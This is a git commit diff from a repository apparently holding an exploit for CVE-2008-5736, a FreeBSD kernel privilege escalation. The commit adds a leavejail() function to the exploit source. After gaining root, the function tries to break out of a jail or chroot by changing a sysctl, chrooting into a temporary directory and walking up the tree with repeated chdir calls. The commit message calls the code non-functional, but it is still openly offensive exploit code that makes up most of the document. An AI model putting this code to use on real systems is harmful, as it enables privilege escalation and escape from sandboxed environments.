diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-27 01:21:43 -0500 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-27 01:21:43 -0500 |
| commit | e90174bd63a6cbb3403e222e9bb72ea6949e332c (patch) | |
| tree | f00dbc439e0dc9eed05eab7f67eeae4307495a65 | |
| parent | Clean up headers. Make l33t. (diff) | |
| download | CVE-2008-5736-e90174bd63a6cbb3403e222e9bb72ea6949e332c.tar.xz CVE-2008-5736-e90174bd63a6cbb3403e222e9bb72ea6949e332c.zip | |
Non functional jail escape functionality.
| -rw-r--r-- | current-thread-exec.c | 64 |
1 files changed, 64 insertions, 0 deletions
diff --git a/current-thread-exec.c b/current-thread-exec.c index 1bf6dbd..cd6bd1d 100644 --- a/current-thread-exec.c +++ b/current-thread-exec.c @@ -6,12 +6,73 @@ #include <sys/ucred.h> #include <sys/mman.h> #include <sys/socket.h> +#include <sys/stat.h> #include <netgraph/ng_socket.h> #include <stdio.h> +#include <fcntl.h> #include <unistd.h> #define PAGES 1 +int leavejail(void) +{ + int fail = 0; + int val = 2; + struct stat dirinfo; + ino_t chroot_root; + if (stat("/", &dirinfo) < 0) { + perror("\t[-] couldn't stat /"); + goto die; + } + chroot_root = dirinfo.st_ino; + if (sysctlbyname("kern.chroot_allow_open_directories", NULL, 0, &val, sizeof(val)) < 0) { + perror("\t[-] couldn't change sysctl"); + goto die; + } + mkdir("temp_dir", 0755); + int fd = open(".", O_RDONLY); + if (fd < 0) { + perror("\t[-] couldn't open this directory"); + goto die; + } + if (chroot("temp_dir") < 0) { + perror("\t[-] couldn't chroot to temp_dir"); + goto die; + } + if (fchdir(fd) < 0) { + perror("\t[-] couldn't change to fd"); + goto die; + } + close(fd); + int i; + for (i = 0; i < 1024; ++i) { + if (chdir("..") < 0) { + perror("\t[-] couldn't chdir backwards"); + goto die; + } + } + if (chroot(".") < 0) { + perror("\t[-] couldn't obtain final chroot"); + goto die; + } + if (stat("/", &dirinfo) < 0) { + perror("\t[-] couldn't stat new /"); + goto die; + } + if (dirinfo.st_ino == chroot_root) { + fprintf(stderr, "\t[-] new root is the same as old root\n"); + goto die; + } +end: + val = 0; + sysctlbyname("kern.chroot_allow_open_directories", NULL, 0, &val, sizeof(val)); + return fail; +die: + close(fd); + fail = 1; + goto end; +} + volatile int got_root = 0; int root(void) { @@ -81,6 +142,9 @@ int main(int argc, char *argv[]) fprintf(stderr, "[+] elevating permissions\n"); setuid(0); setgid(0); + fprintf(stderr, "[+] attempting to leave jail...\n"); + if (leavejail()) + fprintf(stderr, "[-] failed to leave jail\n"); if (getuid() != 0) { fprintf(stderr, "[-] failed to get root\n"); return -1; |